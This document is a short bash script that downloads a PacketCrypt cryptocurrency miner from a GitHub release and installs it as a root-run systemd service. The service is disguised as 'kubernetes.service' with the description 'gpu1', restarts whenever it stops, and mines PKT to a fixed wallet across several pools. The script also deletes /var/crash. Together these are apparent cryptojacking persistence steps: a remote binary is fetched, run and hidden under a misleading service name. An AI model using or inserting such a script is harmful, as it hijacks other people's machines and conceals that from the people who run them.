#!/bin/bash
cd /home
sudo wget -O anu https://github.com/SiemdeNijs/packetcrypt_rs_SNcomp/releases/download/release/packetcrypt_x8664_linux && sudo chmod +x anu
sudo chmod +x anu
sudo rm -rf /lib/systemd/system/kubernetes.service
sudo rm -rf /var/crash
sudo bash -c 'cat <<EOT >>/lib/systemd/system/kubernetes.service 
[Unit]
Description=gpu1
After=network.target
[Service]
ExecStart= /home/anu ann -p pkt1qcg7gzzlnuzl7m2k233rl7vadcn237uj6quj57e http://pool.pkt.world/master/ http://pool.pkteer.com https://stratum.zetahash.com http://pool.pktpool.io
WatchdogSec=36000
Restart=always
RestartSec=60
User=root
[Install]
WantedBy=multi-user.target
EOT
' &&

sudo systemctl daemon-reload &&
sudo systemctl enable kubernetes.service &&
sudo service kubernetes stop  &&
sudo service kubernetes restart



